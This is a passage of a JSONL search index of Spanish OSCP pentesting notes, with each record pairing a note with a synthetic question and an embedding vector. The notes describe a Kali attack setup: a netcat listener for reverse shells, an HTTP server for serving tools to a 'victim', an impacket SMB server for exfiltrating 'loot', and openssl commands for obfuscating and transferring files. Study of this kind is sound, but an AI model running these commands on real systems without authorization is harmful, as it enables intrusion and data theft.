7788 -cert c.pem -key k.pem < f # transferencia TLS\n```\n\nRelacionado: Egress filtering Β· Tunneling Β· Herramientas (Γ­ndice) Β· OSCP MOC", "indexar": "que programa sirve para encriptar un archivo antes de enviarlo", "v": [0.00509, -0.02825, -0.05345, -0.17716, 0.05923, -0.26377, 0.0195, 0.02549, -0.01039, -0.10015, -0.01236, -0.15237, 0.09913, -0.0637, 0.04738, -0.06697, 0.09978, -0.10215, 0.14602, 0.02825, 0.02891, 0.02271, 0.01855, -0.1254, -0.12439, -0.02208, 0.00711, 0.11169, -0.06933, 0.04403, 0.01804, 0.0085, 0.11698, 0.00066, 0.0869, 0.03153, 0.07561, 0.03073, -0.14764, 0.21582, 0.09884, -0.00356, -0.00981, 0.07926, -0.06802, -0.06694, 0.06036, 0.06848, 0.06919, -0.01864, 0.00055, -0.1214, -0.06374, 0.05503, -0.04919, -0.05371, -0.0776, -0.23369, -0.04687, 0.03103, -0.02337, 0.07593, 0.00422, 0.00209, -0.00982, -0.08298, -0.03767, 0.03689, -0.18856, 0.02732, -0.05789, 0.12008, 0.00056, 0.07869, -0.04739, 0.01225, -0.10258, -0.06403, -0.04496, 0.06651, -0.05027, 0.01213, 0.06143, 0.05442, -0.15213, 0.013, 0.02414, 0.08017, 0.00059, -0.04729, 0.01485, 0.10417, 0.01032, 0.07602, 0.11182, -0.07457, 0.00809, 0.00887, -0.00535, 0.03294, 0.06105, -0.06561, -0.01493, 0.08951, 0.02435, 0.08398, 0.04225, 0.03607, 0.0152, -0.01127, -0.0044, 0.01564, 0.00385, 0.04984, -0.10906, -0.03, 0.00497, -0.03464, 0.09189, -0.02289, -0.09113, 0.0421, -0.06925, 0.09149, 0.02104, 0.0012, -0.06246, 0.06957, -0.06584, 0.06265, -0.05997, 0.00569, -0.11678, 0.01859, -0.0473, -0.0344, 0.04229, 0.01513, -0.00054, -0.02974, 0.07663, 0.0587, -0.0157, 0.0576, 0.04478, 0.03512, -0.02239, -0.06783, -0.01774, -0.0702, 0.02877, 0.01184, 0.00861, -0.03079, -0.06822, -0.0267, 0.04621, -0.11663, -0.0401, 0.03304, -0.02715, 0.05904, -0.00557, -0.00839, 0.0125, -0.07235, 0.02054, 0.03947, -0.00254, 0.00119, 0.03251, -0.02376, 0.04124, -0.09316, -0.02734, -0.01435, 0.0112, -0.09497, 0.02839, -0.03647, -0.00941, 0.02247, 0.06159, 0.09757, 0.02067, -0.04619, 0.03535, -0.00286, -0.01756, 0.00676, -0.0211, -0.01273, -0.03311, 0.06201, -0.02386, 0.00942, -0.05365, 0.04649, 0.01078, 0.00034, -0.02048, -0.02459, -0.03504, 0.0506, 0.01575, 0.06156, -0.02779, -0.06166, 0.00932, 0.06456, 0.02313, 0.00248, 0.0356, -0.00924, 0.01733, -0.04688, 0.0321, 0.08619, 0.0002, 0.01841, -0.01195, -0.01503, 0.08492, -0.01095, 0.00218, -0.07111, 0.04022, 0.02692, 0.00752, -0.02747, 0.00096, 0.05536, -0.03267, 0.02223, 0.08753, -0.04214, -0.03164, 0.01621, 0.01108, -0.12934, -0.0273, 0.04173, -0.0216, -0.05687, -0.00716, 0.02112, -0.05319, 0.03703, 0.04375, -0.01693, -0.06026, 0.00099, 0.03148, -0.04921, 0.03152, 0.02603]} +{"tipo": "pregunta", "herramienta": "Transferencia de ficheros", "perfil": "PENTESTERS", "fichero": "conocimiento/03 - Shells/Transferencia de ficheros.md", "tema": "shells", "fuente": null, "licencia": null, "texto": "## Cifrado (canal vigilado)\n```bash\nopenssl enc -base64 -in f -out f.b64 # ofuscar\nopenssl s_server -quiet -accept 7788 -cert c.pem -key k.pem < f # transferencia TLS\n```\n\nRelacionado: Egress filtering Β· Tunneling Β· Herramientas (Γ­ndice) Β· OSCP MOC", "indexar": "con que puedo establecer una conexiΓ³n segura para transferir datos", "v": [0.0081, 0.16007, -0.23706, -0.13264, 0.155, -0.07307, -0.04616, -0.09263, -0.15397, -0.0016, -0.11339, -0.07756, 0.01445, -0.06658, 0.02008, 0.03389, 0.03115, -0.01371, 0.05517, -0.10591, 0.10131, -0.03119, 0.05206, -0.14983, -0.07456, 0.01926, 0.01026, 0.02364, -0.09576, -0.0032, 0.07371, -0.05477, 0.02411, 0.11149, 0.03368, 0.04432, -0.06041, 0.17524, 0.07338, -0.10676, 0.04039, 0.01888, 0.01639, 0.12952, 0.04018, -0.04581, -0.06467, -0.04423, 0.06607, -0.11358, -0.00386, 0.03334, -0.1347, -0.17999, -0.102, -0.04541, 0.11313, -0.01463, 0.09627, 0.10433, -0.07243, -0.0425, -0.0253, 0.09196, 0.10281, 0.00905, 0.02754, -0.00886, -0.11672, 0.10506, 0.09283, 0.04244, -0.06679, 0.0718, 0.01616, -0.01359, 0.0687, 0.00275, 0.04817, 0.06867, -0.0719, 0.00871, 0.0063, -0.00845, 0.00257, 0.03195, 0.00928, -0.05676, 0.03893, -0.00632, 0.07245, -0.05638, 0.05157, -0.04152, 0.0366, 0.04165, -0.09414, -0.06907, -0.05474, -0.05746, -0.01135, 0.10286, -0.02717, 0.14596, -0.04359, -0.01922, 0.1064, 0.00437, 0.07642, -0.08627, -0.00325, 0.01899, 0.01077, -0.03001, 0.02989, 0.01554, -0.05401, -0.01368, -0.03102, 0.02382, -0.03377, -0.06973, 0.07197, 0.00341, -0.04976, -0.03344, -0.05857, 0.09958, -0.02436, 0.07752, -0.0344, 0.0331, -0.06578, -0.07386, 0.01575, 0.06481, -0.03222, -0.11188, 0.04959, -0.06209, -0.02718, 0.01435, -0.04889, -0.01912, 0.00932, 0.02522, -0.02528, 0.05252, -0.04717, -0.02998, -0.0131, 0.07614, -0.04286, 0.07973, -0.05033, 0.09505, 0.0479, -0.04587, -0.04431, 0.04158, 0.03964, 0.07851, 0.03532, -0.01268, 0.00832, -0.02849, 0.0135, -0.03776, 0.07668, 0.00965, -0.05631, 0.04021, 0.01955, -0.07073, 0.02926, 0.00294, -0.08416, -0.07278, -0.01581, -0.0703, 0.01414, -0.04676, -0.02141, -0.00679, 0.03712, -0.01683, 0.00094, 0.02032, -0.03877, 0.0404, -0.01338, 0.06946, 0.06015, 0.02611, 0.01934, -0.10203, -0.03168, -0.01055, 0.00331, 0.03461, -0.03553, 0.00145, -0.00071, -0.03878, 0.02527, 0.05913, -0.06685, 0.00392, -0.0149, 0.00276, 0.01235, -0.02963, 0.12103, -0.07956, -0.07161, -0.01389, 0.00324, -0.01638, -0.01822, 0.0659, -0.03174, 0.04709, 0.00559, -0.0275, -0.00331, 0.01475, -0.00059, -0.00463, -0.01273, -0.01903, 0.00906, 0.05796, 0.02052, -0.0337, 0.09008, 0.01507, -0.05156, -0.10832, -0.05607, 0.00325, 0.00874, 0.06502, -0.06082, -0.05198, 0.02676, -0.01832, -0.14967, 0.03826, -0.01276, -0.1086, -0.01373, 0.00071, 0.06363, -0.00609, -0.01176, -0.04866]} +{"tipo": "pregunta", "herramienta": "Puesto de mando Kali", "perfil": "PENTESTERS", "fichero": "conocimiento/03 - Shells/Puesto de mando Kali.md", "tema": "shells", "fuente": null, "licencia": null, "texto": "# Puesto de mando Kali\n\n> **No tienes una GUI central.** Cada herramienta es independiente y habla por red con la vΓ­ctima.\n> Tu Kali = un puesto de mando con varios terminales abiertos a la vez.", "indexar": "cual programa hay que me permita controlar varios terminales a la vez para hacer pruebas?", "v": [0.0326, 0.12217, -0.15288, -0.1477, 0.05675, -0.06661, 0.06596, 0.02731, -0.06058, -0.0824, -0.08892, 0.1002, 0.07241, -0.08052, 0.06729, 0.02701, 0.02501, -0.11223, 0.15465, -0.03986, -0.01467, -0.07231, -0.07683, -0.06796, -0.03903, 0.07182, 0.02077, -0.10831, -0.05624, -0.16444, 0.03619, -0.00925, 0.17573, -0.11144, -0.04674, 0.04965, -0.01579, 0.00486, 0.10758, 0.1354, 0.00855, -0.06304, -0.0481, -0.00294, 0.16156, -0.02392, 0.03392, 0.0287, 0.02009, -0.10676, -0.04024, 0.05218, -0.01679, 0.05054, 0.0335, -0.11966, 0.01255, -0.08808, -0.00097, -0.07187, 0.00874, -0.03798, 0.18144, 0.06039, -0.00315, 0.04311, 0.0709, 0.02257, -0.11921, 0.08218, 0.00868, 0.07602, 0.02483, 0.04604, -0.06796, -0.0016, -0.09242, 0.02024, 0.08464, -0.05409, -0.05769, -0.06159, -0.04498, 0.04578, -0.04782, -0.08448, -0.10503, 0.00323, -0.07631, -0.00637, 0.06042, 0.01162, 0.02043, 0.06387, 0.06351, -0.06594, 0.09275, 0.11653, -0.00961, 0.01529, 0.11326, 0.0192, -0.11807, 0.12815, -0.10456, 0.04831, 0.04679, -0.04849, 0.00149, 0.02038, -0.04282, -0.02576, 0.04355, -0.02096, -0.11867, 0.04767, 0.03843, -0.03109, -0.03892, -0.08502, -0.09221, -0.00797, -0.01937, 0.0056, 0.1437, 0.02771, 0.01301, 0.06272, 0.06734, 0.09479, 0.08661, 0.02837, 0.05451, 0.00299, -0.0944, 0.00413, 0.04272, -0.05194, -0.00078, 0.00068, -0.00862, 0.09376, 0.06049, -0.02849, 0.09671, 0.00694, -0.12581, 0.01319, -0.05229, 0.03004, 0.0104, -0.00422, -0.05851, 0.07736, -0.06273, -0.00764, 0.05247, -0.02664, -0.04751, 0.09103, -0.08566, -0.01704, -0.08975, -0.02605, 0.06578, -0.01679, -0.03492, 0.01525, 0.04856, -0.00281, -0.03214, 0.01591, -0.01702, -0.01281, 0.05833, -0.03538, 0.02566, -0.09003, 0.01012, -0.09369, -0.05886, 0.07262, 0.04278, -0.02385, 0.00341, -0.01476, -0.05686, 0.06068, 0.07984, 0.02226, 0.01194, 0.09574, 0.00306, -0.00395, 0.07991, 0.00571, 0.03111, -0.02193, -0.00409, -0.0323, -0.05456, -0.02258, 0.02569, -0.02924, 0.07656, 0.0643, -0.04235, 0.02693, 0.04532, 0.051, 0.01909, 0.00525, 0.07005, -0.01229, -0.06233, -0.03275, -0.02228, 0.01772, -0.02402, 0.02975, 0.06403, -0.02364, 0.04407, 0.05569, -0.04747, 0.01772, 0.02636, 0.05344, 0.0186, -0.00117, -0.0048, -0.03542, 0.01531, -0.03293, 0.05391, 0.0081, 0.0131, -0.05135, -0.00143, -0.12155, -0.03043, 0.10123, 0.01451, -0.04573, -0.08261, -0.00575, -0.07731, -0.00645, -0.005, -0.01087, -0.00415, 0.04581, 0.04606, -0.06997, 0.01678, -0.01756]} +{"tipo": "pregunta", "herramienta": "Puesto de mando Kali", "perfil": "PENTESTERS", "fichero": "conocimiento/03 - Shells/Puesto de mando Kali.md", "tema": "shells", "fuente": null, "licencia": null, "texto": "# Puesto de mando Kali\n\n> **No tienes una GUI central.** Cada herramienta es independiente y habla por red con la vΓ­ctima.\n> Tu Kali = un puesto de mando con varios terminales abiertos a la vez.", "indexar": "con que puedo montar una interfaz central para gestionar mΓΊltiples herramientas de red?", "v": [0.05101, 0.07427, -0.15737, -0.25329, -0.07889, 0.01918, -0.1202, 0.10953, -0.135, -0.10385, -0.04661, -0.03697, 0.04143, -0.11584, 0.16825, 0.14459, -0.03735, -0.11459, -0.02782, -0.05217, 0.00383, -0.03241, -0.0095, -0.03544, -0.03526, 0.081, 0.07249, -0.14635, -0.10369, 0.03742, 0.02658, 0.01623, 0.04755, -0.02878, -0.01545, -0.091, -0.05779, 0.11948, -0.02224, -0.07794, -0.05765, 0.04882, -0.14054, 0.06325, 0.14123, -0.03152, 0.00036, -0.04244, -0.03128, 0.06899, -0.0312, -0.23252, -0.11241, -0.07375, 0.00598, -0.1499, 0.13123, -0.04956, -0.0257, -0.04041, -0.03747, 0.12025, -0.08712, 0.14631, 0.01342, -0.04948, -0.08491, -0.04213, -0.04731, 0.13084, -0.00195, 0.03104, -0.01671, 0.01301, 0.04852, 0.01197, 0.01643, 0.02454, 0.12999, 0.03593, 0.01622, 0.05449, -0.0216, 0.01783, 0.01557, -0.08517, 0.06177, -0.10435, -0.0499, -0.02379, 0.00696, -0.05231, 0.02291, -0.10749, 0.06574, -0.03774, 0.00971, 0.04871, 0.01532, -0.06378, 0.01783, 0.04319, -0.0758, 0.10452, -0.0397, -0.02583, 0.06643, -0.04403, 0.01964, -0.03112, 0.00107, 0.01959, 0.04917, 0.02335, -0.05988, -0.00798, -0.03817, 0.04258, -0.00271, -0.08272, 0.00693, -0.00699, 0.00043, 0.00858, 0.08517, -0.06813, 0.01771, 0.05647, 0.05549, 0.02277, -0.07821, -0.0293, -0.03631, -0.09594, -0.01778, 0.02134, -0.04337, -0.08911, -0.01616, -0.09521, -0.02706, 0.06661, -0.03242, -0.12634, 0.07338, 0.05438, 0.03472, -0.09315, 0.02761, 0.0714, 0.04532, -0.01962, 0.06522, 0.03134, -0.04065, 0.01798, 0.0123, 0.0064, -0.06341, 0.0464, -0.04564, 0.00541, -0.0668, 0.0673, 0.00469, -0.02599, -0.04583, 0.05924, 0.07608, -0.01432, -0.00958, 0.06422, 0.04042, -0.00831, 0.02154, -0.00705, -0.034, -0.09579, 0.02289, -0.05465, 0.01902, 0.0071, -0.05893, 0.02079, -0.0413, -0.06103, -0.05786, 0.02406, -0.0275, 0.00157, -0.05146, 0.04474, -0.01077, 0.01285, 0.13212, 0.01007, -0.02909, 0.00715, -0.05258, -0.03273, -0.00546, 0.06627, 0.01271, -0.04214, 0.01672, 0.04267, -0.07141, 0.09732, 0.03912, 0.07208, 0.01824, -0.0096, 0.08128, -0.0734, -0.04057, -0.03435, 0.01095, -0.0037, 0.03931, -0.03928, 0.02948, 0.024, 0.05566, 0.01757, -0.01798, -0.05069, -0.02051, 0.02456, 0.02998, 0.03624, -0.01559, 0.02819, 0.01424, -0.00211, -0.01374, -0.02014, 0.08239, -0.00965, -0.00967, -0.01213, 0.02218, 0.04869, 0.0081, 0.00731, -0.0054, -0.02983, -0.08014, 0.01269, 0.01217, -0.05046, -0.04083, 0.04568, 0.0166, -0.00907, -0.029, -0.04252]} +{"tipo": "pregunta", "herramienta": "Puesto de mando Kali", "perfil": "PENTESTERS", "fichero": "conocimiento/03 - Shells/Puesto de mando Kali.md", "tema": "shells", "fuente": null, "licencia": null, "texto": "# Puesto de mando Kali\n\n> **No tienes una GUI central.** Cada herramienta es independiente y habla por red con la vΓ­ctima.\n> Tu Kali = un puesto de mando con varios terminales abiertos a la vez.", "indexar": "que herramienta sirve para tener varias ventanas de consola abiertas como un ΓΊnico sistema de control?", "v": [0.10852, 0.04586, -0.24092, -0.11543, -0.06416, -0.14853, -0.08659, -0.10403, 0.04371, -0.12085, -0.11536, -0.14788, -0.00979, -0.06972, 0.05753, 0.04416, 0.04267, -0.20451, 0.05824, 0.0653, -0.0602, -0.05987, 0.01145, -0.09468, -0.04567, 0.005, 0.07004, -0.10108, -0.14107, 0.01164, -0.03234, -0.01205, 0.13023, -0.05947, -0.06534, -0.10177, -0.06039, 0.06943, 0.11565, -0.01879, 0.09076, 0.04378, -0.05352, 0.03976, 0.09271, -0.06261, 0.02502, 0.0082, -0.05993, 0.04377, -0.11117, -0.12881, -0.07874, 0.04461, 0.1202, -0.14297, 0.0568, -0.0204, 0.04981, -0.06226, -0.04828, 0.04845, 0.05407, 0.0176, -0.04806, 0.00724, -0.04186, -0.09396, -0.01486, 0.08238, -0.11808, -0.01743, 0.04676, 0.02065, -0.04744, 0.01549, -0.10918, -0.0245, 0.04111, -0.04321, 0.0737, -0.01818, -0.16495, -0.01198, 0.00982, -0.08883, 0.01949, -0.02906, -0.0332, -0.1012, -0.00429, -0.01275, 0.00574, 0.09925, 0.08019, -0.03998, -0.02352, 0.0169, -0.01102, -0.03138, 0.14114, -0.07792, -0.0894, 0.08816, -0.07072, -0.00127, 0.00629, -0.12257, -0.01847, -0.04713, 0.00724, 0.04947, -0.02087, -0.00583, -0.05207, -0.01071, -0.07942, -0.0442, 0.03733, -0.05084, 0.02841, -0.02355, -0.01365, -0.08014, 0.04355, -0.03253, -0.05395, 0.06483, 0.00745, 0.06182, -0.03981, -0.0472, -0.08816, 0.0707, -0.00751, -0.01236, -0.02629, -0.03692, -0.02499, -0.07245, 0.00304, 0.10428, 0.03987, -0.15245, 0.12936, 0.00443, 0.02554, 0.00199, -0.03821, -0.0499, -0.00554, 0.0017, 0.01477, 0.02309, 0.0009, 0.05304, -0.03903, 0.03961, -0.05109, 0.04009, -0.05886, 0.0033, -0.01886, 0.05164, 0.05398, -0.0406, -0.04407, -0.01121, 0.08398, 0.01949, 0.02322, 0.04118, 0.06115, 0.00353, -0.02369, -0.0657, -0.07628, -0.04354, -0.0167, -0.0874, -0.0522, 0.04496, -0.07053, -0.03521, -0.04936, -0.00087, -0.02096, -0.06204, 0.00919, -0.00605, 0.05241, 0.01223, -0.03798, -0.07471, 0.0353, 0.01957, -0.04268, -0.07063, -0.00054, 0.00223, -0.07557, 0.02782, 0.00903, -0.0897, 0.01125, 0.06135, -0.0081, 0.01636, 0.03361, 0.05121, 0.04435, 0.05456, 0.03286, 0.05791, -0.01105, -0.04408, 0.02536, 0.0222, -0.00153, -0.04627, 0.05672, -0.06766, 0.04393, -0.01766, 0.00266, 0.01153, -0.00516, 0.06086, 0.02317, -0.04794, 0.01902, -0.06553, 0.0677, -0.01302, 0.04454, -0.06053, 0.034, -0.04352, -0.0108, -0.01753, -0.02837, 0.02162, 0.02653, -0.02789, -0.02697, -0.1067, -0.04319, 0.00699, 0.01696, -0.1174, -0.08522, 0.02082, 0.00191, -0.01475, -0.00549, -0.03116]} +{"tipo": "pregunta", "herramienta": "Puesto de mando Kali", "perfil": "PENTESTERS", "fichero": "conocimiento/03 - Shells/Puesto de mando Kali.md", "tema": "shells", "fuente": null, "licencia": null, "texto": "## Los 4 terminales\n```\nTerminal 1 β€” listener de shells\n stty raw -echo; (stty size; cat) | nc -lvnp 4444\n\nTerminal 2 β€” HTTP para servir tus tools a la vΓ­ctima\n cd tu carpeta\n python3 -m http.server 80\n\nTerminal 3 β€” SMB para que la vΓ­ctima TE envΓ­e ficheros\n mkdir /tmp/loot && cd /tmp/loot\n impacket-smbserver loot . -smb2support\n\nTerminal 4 β€” tu shell de trabajo (nxc, impacket, etc.)\n $\n```\n\n- Terminal 1 recibe la Reverse shell (estabilΓ­zala β†’ Estabilizar shell TTY).\n- Terminales 2 y 3 = Transferencia de ficheros (subir tools / exfiltrar loot).\n- Terminal 4 = lanzas Impacket, BloodHound, etc.\n\nRelacionado: Egress filtering Β· OSCP MOC", "indexar": "que programa sirve para recibir una conexiΓ³n reversa estable en el terminal?", "v": [-0.00539, 0.03784, -0.25053, -0.28061, 0.09439, -0.09238, -0.09489, -0.09137, 0.02944, 0.00664, -0.17942, -0.07019, 0.05475, -0.02208, 0.0655, 0.04371, -0.05828, -0.06032, 0.19966, -0.01494, -0.0204, 0.03542, -0.01584, -0.05199, 0.04815, 0.13216, 0.02785, -0.07196, -0.07199, -0.14617, 0.10779, -0.16962, 0.09835, -0.07443, 0.00911, 0.00965, 0.00106, 0.0411, 0.0622, 0.09282, 0.0959, -0.12502, 0.07367, 0.07513, 0.13815, -0.02967, 0.07667, -0.03033, 0.02279, -0.01153, -0.05932, 0.08557, -0.06173, -0.00129, -0.00849, -0.00134, -0.0024, -0.11446, 0.04531, -0.00956, -0.08027, -0.02678, 0.01351, -0.06693, 0.08297, 0.01983, 0.03247, 0.05736, -0.07691, -0.04659, -0.02906, 0.11553, 0.02821, -0.01066, 0.00305, 0.053, 0.00973, 0.01255, 0.07514, -0.01345, -0.05503, -0.0221, -0.0157, 0.04494, 0.01699, -0.02229, -0.0286, 0.03106, -0.00515, 0.04862, 0.07494, 0.02949, 0.00786, 0.05292, 0.00762, -0.14348, -0.11806, -0.00891, -0.01206, -0.02917, 0.10897, 0.01336, 0.02088, 0.09997, -0.06095, 0.03824, 0.08901, -0.04147, 0.01813, 0.07211, 0.00567, -0.05595, 0.10702, 0.05535, -0.08299, -0.02367, 0.0147, 0.00953, -0.01659, 0.02212, -0.06295, -0.00012, -0.0378, 0.04973, 0.04326, 0.02086, -0.00393, 0.05565, 0.06686, 0.08293, -0.00474, 0.02968, 0.01234, -0.02224, -0.10998, -0.08925, 0.07698, -0.08311, 0.02345, -0.00307, 0.03574, 0.11016, 0.02577, 0.03002, 0.05947, 0.00065, 0.07266, -0.07141, -0.02894, -0.01727, -0.04565, 0.0023, -0.03161, -0.02953, -0.09648, -0.0309, 0.00741, -0.02207, -0.0895, 0.07871, -0.0423, -0.08645, -0.04003, -0.00084, 0.0164, -0.01329, -0.09879, -0.00069, 0.08166, 0.04584, -0.02946, 0.02208, 0.02569, -0.00637, -0.02391, 0.04319, -0.0503, -0.02888, 0.00228, -0.02919, -0.05556, -0.03457, 0.05519, -0.01087, -0.02322, -0.03834, -0.00814, 0.06105, 0.0441, 0.04106, 0.02635, 0.01959, -0.0226, 0.04695, 0.01303, -0.01941, 0.03152, -0.00727, 0.05682, 0.01519, -0.02483, -0.03775, 0.09082, -0.0093, 0.08192, 0.09436, -0.10606, 0.0076, 0.03696, 0.09956, -0.05173, 0.02182, 0.00928, 0.091, -0.0205, -0.07923, -0.00202, 0.03425, 0.02457, 0.14162, 0.00901, -0.05794, -0.0309, 0.06001, 0.04254, -0.0886, 0.03779, 0.02489, 0.01977, 0.01655, -0.0074, -0.02404, -0.0112, -0.03365, -0.01832, -0.03995, -0.02176, -0.02271, 0.01531, -0.07905, -0.02095, 0.08543, -0.00995, -0.05566, 0.00474, 0.00281, -0.0081, -0.01155, -0.01044, 0.0444, -0.07109, 0.03444, 0.05346, -0.0014, 0.01923, 0.03196]} +{"tipo": "pregunta", "herramienta": "Puesto de mando Kali", "perfil": "PENTESTERS", "fichero": "conocimiento/03 - Shells/Puesto de mando Kali.md", "tema": "shells", "fuente": null, "licencia": null, "texto": "## Los 4 terminales\n```\nTerminal 1 β€” listener de shells\n stty raw -echo; (stty size; cat) | nc -lvnp 4444\n\nTerminal 2 β€” HTTP para servir tus tools a la vΓ­ctima\n cd tu carpeta\n python3 -m http.server 80\n\nTerminal 3 β€” SMB para que la vΓ­ctima TE envΓ­e ficheros\n mkdir /tmp/loot && cd /tmp/loot\n impacket-smbserver loot . -smb2support\n\nTerminal 4 β€” tu shell de trabajo (nxc, impacket, etc.)\n $\n```\n\n- Terminal 1 recibe la Reverse shell (estabilΓ­zala β†’ Estabilizar shell TTY).\n- Terminales 2 y 3 = Transferencia de ficheros (subir tools / exfiltrar loot).\n- Terminal 4 = lanzas Impacket, BloodHound, etc.\n\nRelacionado: Egress filtering Β· OSCP MOC", "indexar": "cual es la herramienta con que puedo subir archivos desde el ordenador de la vΓ­ctima a mi?", "v": [-0.0519, 0.09719, -0.07467, -0.13999, -0.08401, -0.1669, -0.13959, -0.00572, -0.06766, -0.07068, -0.03302, -0.10373, -0.00408, 0.0073, 0.02967, -0.08609, 0.13098, -0.03841, 0.08564, 0.00633, 0.06568, 0.02105, 0.01575, -0.04632, -0.08643, 0.02248, 0.02903, 0.11924, -0.15765, -0.04282, -0.02466, 0.01066, -0.00834, -0.04581, 0.01447, -0.03004, -0.00357, 0.07415, 0.04643, 0.01578, 0.08698, 0.04007, -0.09058, 0.04761, 0.09723, -0.08044, -0.03205, -0.0395, 0.08411, 0.03919, -0.02578, -0.15878, -0.0862, -0.13962, -0.06614, -0.1496, 0.14381, -0.14037, 0.16815, -0.10094, -0.05169, 0.11374, -0.05111, -0.0137, -0.06019, -0.03466, -0.01168, 0.02401, -0.11621, 0.08904, 0.01305, 0.01791, 0.01651, -0.05616, -0.02996, -0.02236, 0.03402, -0.06085, 0.05868, -0.01361, 0.05907, -0.01814, -0.09248, 0.04547, -0.10522, -0.05165, 0.0886, -0.02904, 0.07405, -0.05762, 0.07086, 0.00768, -0.00045, 0.01644, 0.05418, -0.07216, 0.10753, -0.06287, -0.05336, -0.08756, 0.1603, -0.07961, 0.00242, 0.1679, 0.04578, 0.01733, -0.06307, 0.04735, -0.09184, -0.06929, 0.12771, 0.07728, 0.05178, -0.00269, -0.1091, 0.028, 0.00287, -0.08245, -0.04692, -0.0163, 0.10876, 0.07447, 0.01852, -0.04936, 0.00521, 0.0124, -0.00211, 0.08133, -0.07692, -0.09373, 0.05716, 0.02973, 0.01552, -0.02117, -0.0136, -0.03964, 0.03611, -0.0994, -0.00341, -0.07209, 0.09727, 0.0728, -0.08546, -0.07585, -4e-05, 0.00291, -0.02767, -0.0261, -0.10165, -0.08622, 0.0732, -0.0395, 0.05443, -0.00134, -0.03213, 0.04791, -0.02355, -0.02133, -0.06325, 0.03634, -0.08112, 0.04058, 0.03219, 0.02825, -0.02243, -0.06088, 0.03282, -0.02637, 0.10571, 0.01537, -0.0121, -0.00458, 0.01155, -0.01956, 0.02459, -0.1015, -0.05327, -0.02718, -0.02159, -0.02021, -0.01319, 0.06254, -0.03497, 0.03615, -0.03526, -0.05274, 0.02923, -0.03108, -0.03246, 0.0447, -0.04646, -0.00052, -0.01528, -0.0227, 0.0234, -0.03529, -0.07236, 0.03542, 0.01383, -0.00402, -0.08183, -0.00359, -0.06923, -0.03541, 0.0435, 0.04397, -0.01429, -0.07872, 0.00108, 0.02508, -0.02565, 0.02033, 0.03475, -0.0591, 0.0306, -0.07268, 0.02924, -0.00309, 0.0092, 0.00442, 0.03804, -0.00704, 0.07879, -0.01826, -0.03059, 0.00314, -0.0362, 0.02822, -0.03362, -0.06152, -0.01847, -0.0122, 0.03499, -0.00639, -0.01733, -0.03648, 0.03341, -0.01536, -0.09242, 0.02071, -0.02529, 0.08542, 0.05141, -0.06705, -0.06455, 0.04324, -0.04075, -0.02419, -0.05275, -0.07807, -0.01267, 0.01085, 0.02583, -0.05602, -0.0231, -0.0185]} +{"tipo": "pregunta", "herramienta": "Puesto de mando Kali", "perfil": "PENTESTERS", "fichero": "conocimiento/03 - Shells/Puesto de mando Kali.md", "tema": "shells", "fuente": null, "licencia": null, "texto": "## Los 4 terminales\n```\nTerminal 1 β€” listener de shells\n stty raw -echo; (stty size; cat) | nc -lvnp 4444\n\nTerminal 2 β€” HTTP para servir tus tools a la vΓ­ctima\n cd tu carpeta\n python3 -m http.server 80\n\nTerminal 3 β€” SMB para que la vΓ­ctima TE envΓ­e ficheros\n mkdir /tmp/loot && cd /tmp/loot\n impacket-smbserver loot . -smb2support\n\nTerminal 4 β€” tu shell de trabajo (nxc, impacket, etc.)\n $\n```\n\n- Terminal 1 recibe la Reverse shell (estabilΓ­zala β†’ Estabilizar shell TTY).\n- Terminales 2 y 3 = Transferencia de ficheros (subir tools / exfiltrar loot).\n- Terminal 4 = lanzas Impacket, BloodHound, etc.\n\nRelacionado: Egress filtering Β· OSCP MOC", "indexar": "que comando utilizo para montar un servidor SMB y recibir archivos exfiltrados?", "v": [-0.01375, -0.11454, -0.17614, -0.22201, -0.09848, -0.10376, -0.03095, -0.0749, -0.0853, -0.04286, -0.14502, 0.01498, 0.17033, -0.07329, -0.0565, 0.10784, 0.1618, -0.09681, -0.0081, 0.00058, 0.08459, 0.09283, 0.13779, -0.08941, -0.04779, 0.07078, 0.01509, -0.04475, -0.13352, -0.0361, 0.03212, 0.06645, 0.10145, 0.02414, 0.0609, -0.03732, -0.01641, 0.031, -0.08761, 0.16007, 0.01837, 0.00546, -0.17239, 0.0158, -0.01921, -0.06907, 0.07042, -0.06811, 0.08763, 0.07028, 0.08403, -0.08559, -0.15588, 0.04955, -0.1166, -0.00874, 0.05312, -0.19945, 0.08028, 0.02686, -0.09846, 0.00678, 0.02682, 0.09417, -0.01578, -0.0374, -0.0345, -0.00771, -0.15016, -0.02464, -0.07846, 0.07506, -0.02849, -0.03937, -0.02025, 0.05109, 0.0198, 0.00126, 0.01894, 0.04103, 0.00868, -0.00438, -0.03135, 0.07638, -0.1163, -0.08251, -0.02179, -0.05605, 0.02259, 0.01229, 0.03299, 0.0515, -0.05958, 0.08724, 0.05392, -0.04654, 0.00916, 0.05959, 0.06458, 0.03086, 0.03897, 0.01278, -0.03367, 0.18451, 0.08542, 0.09224, 0.08634, -0.03356, 0.03955, 0.00533, 0.01564, -0.01233, 0.044, 0.03547, -0.0978, -0.13298, -0.01375, -0.06513, -0.00889, -0.02957, -0.11742, 0.03929, 0.06145, 0.05399, 0.02152, -0.11563, 0.08684, 0.01332, 0.00707, -0.01903, -0.02901, 0.02646, -0.01065, -0.0095, -0.08843, 0.06877, 0.07831, -0.01469, -0.14918, -0.09266, 0.03386, 0.0407, -0.03341, 0.04558, 0.08532, 0.0428, 0.09451, -0.07556, -0.00155, -0.03575, 0.06904, 0.02724, -0.023, -0.0079, -0.04415, -0.00776, -0.0009, -0.09221, -0.0498, 0.03716, -0.01903, -0.01266, -0.04502, 0.07779, -0.01811, -0.06103, 0.01636, 0.02871, 0.00514, -0.01281, 0.00528, 0.01478, -0.02107, -0.02736, 0.02106, -0.00389, -0.031, -0.023, 0.03475, 0.05561, 0.02728, 0.00709, -0.03367, 0.0162, -0.06787, -0.04422, 0.01105, 0.01218, -0.02202, 0.02085, 0.01527, 0.04169, -0.02329, 0.0379, 0.02728, -0.03845, 0.0082, -0.00299, -0.00505, -0.02699, -0.02851, 0.04038, -0.05393, -0.04285, 4e-05, -0.0616, -0.03508, 0.06863, 0.05681, 0.00304, -0.03283, 0.01184, 0.0135, -0.03839, -0.02935, -0.00197, 0.03314, -0.00102, 5e-05, -0.01677, -0.01629, 0.03904, 0.03709, 0.01111, 0.00705, 0.02661, -0.05614, -0.02438, 0.05066, -0.00052, -0.06066, 0.00554, -0.05442, 0.00885, 0.02972, -0.00545, 0.00884, 0.00628, 0.01533, -0.04568, 0.00398, 0.05266, -0.03062, -0.06999, -0.03768, -0.06673, -0.00713, 0.00369, -0.00857, -0.00052, 0.03424, -0.01606, -0.02935, 0.00745, -0.02709, -0.03477]} +{"tipo": "pregunta", "herramienta": "Estabilizar 